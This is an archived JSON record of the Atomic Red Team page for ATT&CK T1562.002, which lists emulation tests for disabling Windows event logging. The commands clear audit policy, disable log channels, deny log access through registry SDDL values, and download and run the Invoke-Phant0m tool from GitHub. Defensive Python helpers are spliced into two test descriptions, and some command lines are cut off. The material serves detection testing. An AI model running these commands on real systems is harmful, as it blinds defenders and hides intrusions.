{
	"id": "a819122a-2aa8-4c41-b5b1-963ddadeea1c",
	"created_at": "2026-04-06T00:12:58.776891Z",
	"updated_at": "2026-04-10T13:13:08.385838Z",
	"deleted_at": null,
	"sha1_hash": "35133d4a5776cdd31b605dbf66355e9e7b352016",
	"title": "atomic-red-team/atomics/T1562.002/T1562.002.md at master · redcanaryco/atomic-red-team",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 97011,
	"plain_text": "atomic-red-team/atomics/T1562.002/T1562.002.md at master ·\r\nredcanaryco/atomic-red-team\r\nBy Atomic Red Team doc generator\r\nArchived: 2026-04-05 20:08:38 UTC\r\nT1562.002 - Impair Defenses: Disable Windows Event Logging\r\nDescription from ATT\u0026CK\r\nAdversaries may disable Windows event logging to limit data that can be leveraged for detections and audits.\r\nWindows event logs record user and system activity such as login attempts, process creation, and much more.\r\n(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.\r\nThe EventLog service maintains event logs from various system components and applications.(Citation:\r\nEventLog_Core_Technologies) By default, the service automatically starts when a system powers on. An audit\r\npolicy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service\r\nlogs. Security audit policy settings can be changed by running secpol.msc, then navigating to Security\r\nSettings\\Local Policies\\Audit Policy for basic audit policy settings or Security Settings\\Advanced Audit\r\nPolicy Configuration for advanced audit policy settings.(Citation: Audit_Policy_Microsoft)(Citation:\r\nAdvanced_sec_audit_policy_settings) auditpol.exe may also be used to set audit policies.(Citation: auditpol)\r\nAdversaries may target system-wide logging or just that of a particular application. 
For example, the Windows EventLog service may be disabled using the Set-Service -Name EventLog -Status Stopped or sc config eventlog start=disabled commands (followed by manually stopping the service using Stop-Service -Name EventLog).(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging) Additionally, the service may be disabled by modifying the \"Start\" value in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog then restarting the system for the change to take effect.(Citation: disable_win_evt_logging)\r\nThere are several ways to disable the EventLog service via registry key modification. First, without Administrator privileges, adversaries may modify the \"Start\" value in the key HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) Second, with Administrator privilege, adversaries may modify the same values in HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System and HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application to disable the entire EventLog.(Citation: disable_win_evt_logging)\r\nAdditionally, adversaries may use auditpol and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the /success or /failure parameters. 
For example, auditpol /set /category:\"Account Logon\" /success:disable /failure:disable turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC)(Citation: T1562.002_redcanaryco) To clear the audit policy, adversaries may run the following lines: auditpol /clear /y or auditpol /remove /allusers.(Citation: T1562.002_redcanaryco)\r\nBy disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.\r\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md\r\nPage 1 of 7\r\nSource\r\nAtomic Tests\r\nAtomic Test #1: Disable Windows IIS HTTP Logging\r\nAtomic Test #2: Disable Windows IIS HTTP Logging via PowerShell\r\nAtomic Test #3: Kill Event Log Service Threads\r\nAtomic Test #4: Impair Windows Audit Log Policy\r\nAtomic Test #5: Clear Windows Audit Policy Config\r\nAtomic Test #6: Disable Event Logging with wevtutil\r\nAtomic Test #7: Makes Eventlog blind with Phant0m\r\nAtomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell\r\nAtomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell\r\nAtomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell\r\nAtomic Test #1: Disable Windows IIS HTTP Logging\r\nDisables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). 
This action requires the HTTP logging configuration section in IIS to be unlocked.\r\nUse the cleanup commands to turn HTTP logging back on; they set dontLog back to false rather than restoring whatever logging configuration was in place before the test.\r\nSupported Platforms: Windows\r\nauto_generated_guid: 69435dcf-c66f-4ec0-a8b1-82beb76b34db\r\nInputs\r\nName Description Type Default Value\r\nwebsite_name The name of the website on a server string Default Web Site\r\nAttack Commands: Run with powershell !\r\nC:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"#{website_name}\" /section:httplogging /dontLog:true\r\nCleanup Commands\r\nif(Test-Path \"C:\\Windows\\System32\\inetsrv\\appcmd.exe\"){\r\n C:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"#{website_name}\" /section:httplogging /dontLog:false *\u003e$n\r\n}\r\nAtomic Test #2: Disable Windows IIS HTTP Logging via PowerShell\r\nDisables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union). This action requires the HTTP logging configuration section in IIS to be unlocked.\r\nUse the cleanup commands to turn HTTP logging back on; they set dontLog back to false rather than restoring whatever logging configuration was in place before the test.\r\nSupported Platforms: Windows\r\nauto_generated_guid: a957fb0f-1e85-49b2-a211-413366784b1e\r\nInputs\r\nName Description Type Default Value\r\nwebsite_name The name of the website on a server string Default Web Site\r\nAttack Commands: Run with powershell !\r\nset-WebConfigurationProperty -PSPath \"IIS:\\Sites\\#{website_name}\\\" -filter \"system.webServer/httpLogging\" -nam\r\nCleanup Commands\r\nif(Test-Path \"C:\\Windows\\System32\\inetsrv\\appcmd.exe\"){\r\n C:\\Windows\\System32\\inetsrv\\appcmd.exe set config \"#{website_name}\" /section:httplogging /dontLog:false *\u003e$n\r\n}\r\nAtomic Test #3: Kill Event Log Service Threads\r\nKill Windows Event Log Service Threads using Invoke-Phant0m. 
WARNING: you will need to restart the PC to return the Event Log service to its normal state. https://artofpwn.com/phant0m-killing-windows-event-log.html\r\nSupported Platforms: Windows\r\nauto_generated_guid: 41ac52ba-5d5e-40c0-b267-573ed90489bd\r\nAttack Commands: Run with powershell ! Elevation Required (e.g. root or admin)\r\nSet-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy RemoteSigned -ErrorAction Ignore\r\n$url = \"https://raw.githubusercontent.com/hlldz/Invoke-Phant0m/f1396c411a867e1b471ef80c5c534466103440e0/Invoke\r\n$output = \"$env:TEMP\\Invoke-Phant0m.ps1\"\r\n$wc = New-Object System.Net.WebClient\r\n$wc.DownloadFile($url, $output)\r\ncd $env:TEMP\r\nImport-Module .\\Invoke-Phant0m.ps1\r\nInvoke-Phant0m\r\nCleanup Commands\r\nWrite-Host \"NEED TO Restart-Computer TO ENSURE LOGGING RETURNS\" -fore red\r\nRemove-Item \"$env:TEMP\\Invoke-Phant0m.ps1\" -ErrorAction Ignore\r\nAtomic Test #4: Impair Windows Audit Log Policy\r\nDisables Windows audit policy categories to prevent key host-based telemetry from being written to the event logs (Solarigate example).\r\nSupported Platforms: Windows\r\nauto_generated_guid: 5102a3a7-e2d7-4129-9e45-f483f2e0eea8\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\nauditpol /set /category:\"Account Logon\" /success:disable /failure:disable\r\nauditpol /set /category:\"Logon/Logoff\" /success:disable /failure:disable\r\nauditpol /set /category:\"Detailed Tracking\" /success:disable\r\nCleanup Commands\r\nauditpol /set /category:\"Account Logon\" /success:enable /failure:enable\r\nauditpol /set /category:\"Detailed Tracking\" /success:enable\r\nauditpol /set /category:\"Logon/Logoff\" /success:enable /failure:enable\r\nAtomic Test #5: Clear Windows Audit Policy Config\r\nClear the Windows audit policy using the auditpol utility. 
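The auditpol tests (Test #4 above and Test #5 here) are easiest to verify by capturing the output of auditpol /get /category:* before and after the run and comparing the two captures. The Python below is an added example written for this page; it is not Atomic Red Team code and auditpol itself offers no such comparison. It parses the captured output (the rows embedded here are constructed to mimic the real two-column layout, not taken from a live host) and lists every subcategory whose auditing was reduced, which is exactly the change these tests cause and which their cleanup commands only partly undo.

```python
# Added example for this page (not Atomic Red Team code): compare two captures of
# auditpol /get /category:* and list every subcategory whose auditing was reduced.
# BEFORE/AFTER are constructed to mimic the real layout (unindented category lines,
# indented subcategory lines, the setting in the last column); real output has many more rows.

SETTINGS = ('Success and Failure', 'No Auditing', 'Success', 'Failure')   # longest match first
HEADER_PREFIXES = ('System audit policy', 'Category/Subcategory')


def parse_auditpol(lines):
    '''Return {category: {subcategory: setting}} from the lines of auditpol /get /category:* output.'''
    policy, category = {}, None
    for raw in lines:
        stripped = raw.strip()
        if not stripped or stripped.startswith(HEADER_PREFIXES):
            continue
        if not raw.startswith('  '):              # unindented line: a category name
            category = stripped
            policy.setdefault(category, {})
            continue
        if category is None:
            raise ValueError('subcategory before any category: ' + raw)
        text = ' '.join(raw.split())              # collapse the column padding
        for setting in SETTINGS:
            if text.endswith(setting):
                policy[category][text[:-len(setting)].strip()] = setting
                break
        else:
            raise ValueError('unrecognised auditpol line: ' + raw)
    return policy


def audited(setting):
    '''Outcomes recorded by a setting string, as a subset of {Success, Failure}.'''
    return {outcome for outcome in ('Success', 'Failure') if outcome in setting}


def weakened_subcategories(before, after):
    '''(category, subcategory, old, new) for every subcategory that records less after than before.'''
    findings = []
    for category, subs in before.items():
        for name, old in subs.items():
            new = after.get(category, {}).get(name, 'No Auditing')
            if audited(old) - audited(new):
                findings.append((category, name, old, new))
    return findings


# Constructed sample captures: BEFORE is a baseline, AFTER is what Test #4 leaves for these rows.
BEFORE = [
    'System audit policy',
    'Category/Subcategory                      Setting',
    'Logon/Logoff',
    '  Logon                                   Success and Failure',
    '  Logoff                                  Success',
    'Account Logon',
    '  Credential Validation                   Success and Failure',
    'Detailed Tracking',
    '  Process Creation                        Success',
]
AFTER = [
    'System audit policy',
    'Category/Subcategory                      Setting',
    'Logon/Logoff',
    '  Logon                                   No Auditing',
    '  Logoff                                  No Auditing',
    'Account Logon',
    '  Credential Validation                   No Auditing',
    'Detailed Tracking',
    '  Process Creation                        No Auditing',
]

if __name__ == '__main__':
    for row in weakened_subcategories(parse_auditpol(BEFORE), parse_auditpol(AFTER)):
        print('weakened: %s / %s: %s -> %s' % row)
```

To run it against real captures, read each file with open(path).read().splitlines() and pass the list to parse_auditpol. A non-empty result from weakened_subcategories after the cleanup step means the cleanup did not bring the policy back to the baseline, which is expected here because the cleanup enables three whole categories rather than restoring per-subcategory settings.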
This action would stop certain audit events from being recorded in the Security log. Note that the cleanup commands (shared with Test #4) enable every subcategory of three categories rather than restoring the previous policy; to get the original configuration back, save it before the test with auditpol /backup /file:audit-before.csv and reapply it afterwards with auditpol /restore /file:audit-before.csv (the file name is an example).\r\nSupported Platforms: Windows\r\nauto_generated_guid: 913c0e4e-4b37-4b78-ad0b-90e7b25010f6\r\nAttack Commands: Run with command_prompt ! Elevation Required (e.g. root or admin)\r\nauditpol /clear /y\r\nauditpol /remove /allusers\r\nCleanup Commands\r\nauditpol /set /category:\"Account Logon\" /success:enable /failure:enable\r\nauditpol /set /category:\"Detailed Tracking\" /success:enable\r\nauditpol /set /category:\"Logon/Logoff\" /success:enable /failure:enable\r\nAtomic Test #6: Disable Event Logging with wevtutil\r\nWevtutil can be used to disable logs. NOTE: RansomEXX ransomware uses this to disable Security logs post-encryption.\r\nSupported Platforms: Windows\r\nauto_generated_guid: b26a3340-dad7-4360-9176-706269c74103\r\nInputs\r\nName Description Type Default Value\r\nlog_name Name of the log to be disabled string Microsoft-Windows-IKE/Operational\r\nAttack Commands: Run with command_prompt !\r\nwevtutil sl \"#{log_name}\" /e:false\r\nCleanup Commands\r\nwevtutil sl \"#{log_name}\" /e:true\r\nAtomic Test #7: Makes Eventlog blind with Phant0m\r\nUse Phant0m to disable the Event Log service.\r\nSupported Platforms: Windows\r\nauto_generated_guid: 3ddf3d03-f5d6-462a-ad76-2c5ff7b6d741\r\nInputs\r\nName Description Type Default Value\r\nfile_name exe version of Phant0m path PathToAtomicsFolder\\T1562.002\\bin\\Phant0m.exe\r\nAttack Commands: Run with command_prompt !\r\nCleanup Commands\r\necho \"Sorry you have to reboot\"\r\nDependencies: Run with powershell !\r\nDescription: Phant0m.exe must exist on disk at specified location (#{file_name})\r\nCheck Prereq Commands\r\nif (Test-Path \"#{file_name}\") {exit 0} else {exit 1}\r\nGet Prereq Commands\r\nNew-Item -Type Directory (split-path \"#{file_name}\") -ErrorAction ignore | Out-Null\r\nInvoke-WebRequest 
\"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1562.002/bin/Phant0m.exe\r\nAtomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell\r\nThis test simulates an adversary modifying access permissions for a Windows Event Log channel by altering the \"ChannelAccess\" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify an event log channel. Upon execution, the user shouldn't be able to access the event log channel via the Event Viewer or via utilities such as \"Get-EventLog\" or \"wevtutil\" (note that Get-EventLog only reads the classic logs; for the operational channel used by default here, check with Get-WinEvent instead).\r\nSupported Platforms: Windows\r\nauto_generated_guid: 8e81d090-0cd6-4d46-863c-eec11311298f\r\nInputs\r\nName Description Type Default Value\r\nChannelPath Path to the event log service channel to alter string HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WINEVT\\Channels\\Microsof\r\nWindows-TaskScheduler/Operational\r\nAttack Commands: Run with powershell ! Elevation Required (e.g. root or admin)\r\nSet-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value \"O:SYG:SYD:(D;;0x1;;;WD)\"\r\nRestart-Service -Name EventLog -Force -ErrorAction Ignore\r\nCleanup Commands\r\nSet-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value \"O:BAG:SYD:(A;;0x2;;;S-1-15-2-1)(A;;0x2;;;S\r\nRestart-Service -Name EventLog -Force -ErrorAction Ignore\r\nAtomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell\r\nThis test simulates an adversary modifying access permissions for a Windows Event Log channel by altering the \"ChannelAccess\" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. 
These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify an event log channel. Upon execution, the user shouldn't be able to access the event log channel via the Event Viewer or via utilities such as \"Get-EventLog\" or \"wevtutil\".\r\nSupported Platforms: Windows\r\nauto_generated_guid: 85e6eff8-3ed4-4e03-ae50-aa6a404898a5\r\nInputs\r\nName Description Type Default Value\r\nChannelPath Path to the event log service channel to alter string HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\EventLog\\Setup\r\nAttack Commands: Run with powershell ! Elevation Required (e.g. root or admin)\r\nNew-Item -Path #{ChannelPath} -Force\r\nSet-ItemProperty -Path #{ChannelPath} -Name \"ChannelAccess\" -Value \"O:SYG:SYD:(D;;0x1;;;WD)\"\r\nRestart-Service -Name EventLog -Force -ErrorAction Ignore\r\nCleanup Commands\r\nRemove-Item -Path #{ChannelPath} -Force\r\nRestart-Service -Name EventLog -Force -ErrorAction Ignore\r\nAtomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell\r\nThis test simulates an adversary modifying access permissions for a Windows Event Log channel by setting the \"CustomSD\" registry value. Specifically, it changes the Security Descriptor Definition Language (SDDL) string. These modifications can restrict or grant access to specific users or groups, potentially aiding in defense evasion by controlling who can view or modify an event log channel. 
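Tests #8, #9 and #10 all write the SDDL string O:SYG:SYD:(D;;0x1;;;WD) into a registry value, and reading that string back is the quickest way to see what was taken away. The Python below is an added example written for this page, not Atomic Red Team code: it splits an SDDL string into owner, group and DACL, parses each ACE, and flags deny-read ACEs as well as the absence of any allow-read for SYSTEM or Administrators. It assumes the event log access bits 0x1 read, 0x2 write and 0x4 clear, treats the generic rights GA and GR as including read, and the typical allow-list string it carries is constructed for the example rather than copied from a live channel.

```python
# Added example for this page (not Atomic Red Team code): inspect the SDDL string that
# Tests #8-#10 write to ChannelAccess / CustomSD and report what it does to log access.
# Assumptions: event log access bits are 0x1 read, 0x2 write, 0x4 clear; the generic
# rights GA/GR count as read; TYPICAL_SDDL below is constructed, not a live default.

ELF_READ, ELF_WRITE, ELF_CLEAR = 0x1, 0x2, 0x4
GENERIC_READ, GENERIC_WRITE, GENERIC_EXECUTE, GENERIC_ALL = 0x80000000, 0x40000000, 0x20000000, 0x10000000
NAMED_RIGHTS = {'GR': GENERIC_READ, 'GW': GENERIC_WRITE, 'GX': GENERIC_EXECUTE, 'GA': GENERIC_ALL}


def split_sddl(sddl):
    '''Split an SDDL string into its top-level parts: O (owner), G (group), D (DACL), S (SACL).'''
    parts, current, buf, depth, i = {}, None, '', 0, 0
    while i < len(sddl):
        ch = sddl[i]
        # A part marker is one of O/G/D/S followed by ':' outside any ACE parentheses.
        if depth == 0 and ch in 'OGDS' and sddl[i + 1:i + 2] == ':':
            if current is not None:
                parts[current] = buf
            current, buf, i = ch, '', i + 2
            continue
        depth += (ch == '(') - (ch == ')')
        buf += ch
        i += 1
    if current is not None:
        parts[current] = buf
    return parts


def parse_rights(text):
    '''Access mask from an ACE rights field, written either as hex (0x1) or as generic codes (GRGW).'''
    if text.lower().startswith('0x'):
        return int(text, 16)
    mask = 0
    for j in range(0, len(text), 2):
        mask |= NAMED_RIGHTS.get(text[j:j + 2], 0)
    return mask


def parse_aces(dacl):
    '''Return the ACEs of a DACL part as dicts; control flags such as P or AI before the first ACE are skipped.'''
    aces = []
    for chunk in dacl.split('('):
        if ')' not in chunk:
            continue
        fields = chunk[:chunk.index(')')].split(';')
        if len(fields) < 6:
            continue
        aces.append({'type': fields[0], 'flags': fields[1], 'rights': parse_rights(fields[2]), 'trustee': fields[5]})
    return aces


def grants_read(mask):
    '''True when the mask carries event-log read or a generic right that maps onto it.'''
    return bool(mask & (ELF_READ | GENERIC_READ | GENERIC_ALL))


def audit_channel_sddl(sddl):
    '''Findings for a ChannelAccess/CustomSD value: deny-read ACEs, and no allow-read for SYSTEM or Administrators.'''
    findings = []
    aces = parse_aces(split_sddl(sddl).get('D', ''))
    for ace in aces:
        if ace['type'] == 'D' and grants_read(ace['rights']):
            findings.append('deny-read for ' + ace['trustee'])
    readers = {ace['trustee'] for ace in aces if ace['type'] == 'A' and grants_read(ace['rights'])}
    if not readers & {'SY', 'BA'}:
        findings.append('neither SYSTEM (SY) nor Administrators (BA) is allowed read')
    return findings


TEST_SDDL = 'O:SYG:SYD:(D;;0x1;;;WD)'   # the value the tests above write
TYPICAL_SDDL = 'O:BAG:SYD:(A;;0xf0007;;;SY)(A;;0x7;;;BA)(A;;0x1;;;S-1-5-32-573)'   # constructed allow list

if __name__ == '__main__':
    for label, sddl in (('test value', TEST_SDDL), ('typical value', TYPICAL_SDDL)):
        print(label + ':', audit_channel_sddl(sddl) or ['no findings'])
```

In a canonically ordered DACL the deny ACEs come first, so a single deny for WD (Everyone) blocks every account, including any that a later allow ACE in the same string would admit; the deny finding is therefore the one to act on. Feeding the function the current value of the registry path from each test (for example the output of Get-ItemProperty on the ChannelPath or CustomSDPath input) before and after the cleanup confirms whether the cleanup removed it.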
Upon execution, the user shouldn't be able to access the event log channel via the Event Viewer or via utilities such as \"Get-EventLog\" or \"wevtutil\".\r\nSupported Platforms: Windows\r\nauto_generated_guid: a0cb81f8-44d0-4ac4-a8f3-c5c7f43a12c1\r\nInputs\r\nName Description Type Default Value\r\nCustomSDPath Path to the event log service channel to alter string HKLM:\\SYSTEM\\CurrentControlSet\\Services\\EventLog\\System\r\nAttack Commands: Run with powershell ! Elevation Required (e.g. root or admin)\r\nSet-ItemProperty -Path #{CustomSDPath} -Name \"CustomSD\" -Value \"O:SYG:SYD:(D;;0x1;;;WD)\"\r\nCleanup Commands\r\nRemove-ItemProperty -Path #{CustomSDPath} -Name \"CustomSD\"\r\nSource: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"
	],
	"report_names": [
		"T1562.002.md"
	],
	"threat_actors": [
		{
			"id": "e3492534-85a6-4c87-a754-5ae4a56d7c8c",
			"created_at": "2022-10-25T15:50:23.819113Z",
			"updated_at": "2026-04-10T02:00:05.354598Z",
			"deleted_at": null,
			"main_name": "Threat Group-3390",
			"aliases": [
				"Threat Group-3390",
				"Earth Smilodon",
				"TG-3390",
				"Emissary Panda",
				"BRONZE UNION",
				"APT27",
				"Iron Tiger",
				"LuckyMouse",
				"Linen Typhoon"
			],
			"source_name": "MITRE:Threat Group-3390",
			"tools": [
				"Systeminfo",
				"gsecdump",
				"PlugX",
				"ASPXSpy",
				"Cobalt Strike",
				"Mimikatz",
				"Impacket",
				"gh0st RAT",
				"certutil",
				"China Chopper",
				"HTTPBrowser",
				"Tasklist",
				"netstat",
				"SysUpdate",
				"HyperBro",
				"ZxShell",
				"RCSession",
				"ipconfig",
				"Clambling",
				"pwdump",
				"NBTscan",
				"Pandora",
				"Windows Credential Editor"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "c63ab035-f9f2-4723-959b-97a7b98b5942",
			"created_at": "2023-01-06T13:46:38.298354Z",
			"updated_at": "2026-04-10T02:00:02.917311Z",
			"deleted_at": null,
			"main_name": "APT27",
			"aliases": [
				"BRONZE UNION",
				"Circle Typhoon",
				"Linen Typhoon",
				"TEMP.Hippo",
				"Budworm",
				"Lucky Mouse",
				"G0027",
				"GreedyTaotie",
				"Red Phoenix",
				"Iron Tiger",
				"Iron Taurus",
				"Earth Smilodon",
				"TG-3390",
				"EMISSARY PANDA",
				"Group 35",
				"ZipToken"
			],
			"source_name": "MISPGALAXY:APT27",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43",
			"created_at": "2025-08-07T02:03:24.68371Z",
			"updated_at": "2026-04-10T02:00:03.64323Z",
			"deleted_at": null,
			"main_name": "BRONZE UNION",
			"aliases": [
				"APT27 ",
				"Bowser",
				"Budworm ",
				"Circle Typhoon ",
				"Emissary Panda ",
				"Group35",
				"Iron Tiger ",
				"Linen Typhoon ",
				"Lucky Mouse ",
				"TG-3390 ",
				"Temp.Hippo "
			],
			"source_name": "Secureworks:BRONZE UNION",
			"tools": [
				"AbcShell",
				"China Chopper",
				"EAGERBEE",
				"Gh0st RAT",
				"OwaAuth",
				"PhantomNet",
				"PoisonIvy",
				"Sysupdate",
				"Wonknu",
				"Wrapikatz",
				"ZxShell",
				"reGeorg"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "5c13338b-eaed-429a-9437-f5015aa98276",
			"created_at": "2022-10-25T16:07:23.582715Z",
			"updated_at": "2026-04-10T02:00:04.675765Z",
			"deleted_at": null,
			"main_name": "Emissary Panda",
			"aliases": [
				"APT 27",
				"ATK 15",
				"Bronze Union",
				"Budworm",
				"Circle Typhoon",
				"Earth Smilodon",
				"Emissary Panda",
				"G0027",
				"Group 35",
				"Iron Taurus",
				"Iron Tiger",
				"Linen Typhoon",
				"LuckyMouse",
				"Operation DRBControl",
				"Operation Iron Tiger",
				"Operation PZChao",
				"Operation SpoiledLegacy",
				"Operation StealthyTrident",
				"Red Phoenix",
				"TEMP.Hippo",
				"TG-3390",
				"ZipToken"
			],
			"source_name": "ETDA:Emissary Panda",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agent.dhwf",
				"AngryRebel",
				"Antak",
				"CHINACHOPPER",
				"China Chopper",
				"Destroy RAT",
				"DestroyRAT",
				"FOCUSFJORD",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HTTPBrowser",
				"HTran",
				"HUC Packet Transmit Tool",
				"HighShell",
				"HttpBrowser RAT",
				"HttpDump",
				"HyperBro",
				"HyperSSL",
				"HyperShell",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"Nishang",
				"OwaAuth",
				"PCRat",
				"PlugX",
				"ProcDump",
				"PsExec",
				"RedDelta",
				"SEASHARPEE",
				"Sensocode",
				"SinoChopper",
				"Sogu",
				"SysUpdate",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Token Control",
				"TokenControl",
				"TwoFace",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Xamtrav",
				"ZXShell",
				"gsecdump",
				"luckyowa"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236429ce-6355-43f6-9b58-e6803a1df3f4",
			"created_at": "2026-03-16T02:02:50.60344Z",
			"updated_at": "2026-04-10T02:00:03.641587Z",
			"deleted_at": null,
			"main_name": "Bronze Union",
			"aliases": [
				"Circle Typhoon ",
				"Emissary Panda "
			],
			"source_name": "Secureworks:Bronze Union",
			"tools": [
				"China Chopper",
				"OwaAuth",
				"Sysupdate"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434378,
	"ts_updated_at": 1775826788,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/35133d4a5776cdd31b605dbf66355e9e7b352016.pdf",
		"text": "https://archive.orkl.eu/35133d4a5776cdd31b605dbf66355e9e7b352016.txt",
		"img": "https://archive.orkl.eu/35133d4a5776cdd31b605dbf66355e9e7b352016.jpg"
	}
}